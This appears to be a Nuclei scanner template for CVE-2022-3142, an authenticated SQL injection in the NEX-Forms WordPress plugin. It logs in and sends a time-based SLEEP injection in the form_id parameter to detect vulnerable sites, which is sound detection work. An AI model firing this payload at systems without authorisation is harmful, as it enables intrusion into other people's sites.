id: CVE-2022-3142 info: name: NEX-Forms Plugin < 7.9.7 - SQL Injection author: r3Y3r53 severity: high description: | The NEX-Forms WordPress plugin before 7.9.7 does not properly sanitise and escape user input before using it in SQL statements, leading to SQL injections. The attack can be executed by anyone who is permitted to view the forms statistics chart, by default administrators, however can be configured otherwise via the plugin settings. remediation: Fixed in version 7.9.7 reference: - https://wpscan.com/vulnerability/8acc0fc6-efe6-4662-b9ac-6342a7823328/ - https://www.exploit-db.com/exploits/51042 - https://nvd.nist.gov/vuln/detail/CVE-2022-3142 - http://packetstormsecurity.com/files/171477/WordPress-NEX-Forms-SQL-Injection.html - https://medium.com/%40elias.hohl/authenticated-sql-injection-vulnerability-in-nex-forms-wordpress-plugin-35b8558dd0f5 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-3142 cwe-id: CWE-89 epss-score: 0.00318 epss-percentile: 0.67316 cpe: cpe:2.3:a:basixonline:nex-forms:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: basixonline product: nex-forms framework: wordpress publicwww-query: /wp-content/plugins/nex-forms-express-wp-form-builder/ tags: cve,cve2022,wpscan,packetstorm,wordpress,sqli,wp-plugin,wp,authenticated,basixonline http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - | @timeout: 30s GET /wp-admin/admin.php?page=nex-forms-dashboard&form_id=1+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)-- HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'duration>=5' - 'status_code_2 == 200' - 'contains(body_2, "NEX-Forms")' - 'contains(content_type_2, "text/html")' condition: and # digest: 4a0a00473045022100ec8d29550d341798ac1467f8d80b0c7a09e6169593e8d7cc4576dbee2214e27f0220057ac57665c9e34ea9d98b588526a3be8fdef7a5e636f863993e15cf5f07ab55:922c64590222798bb761d5b6d8e72950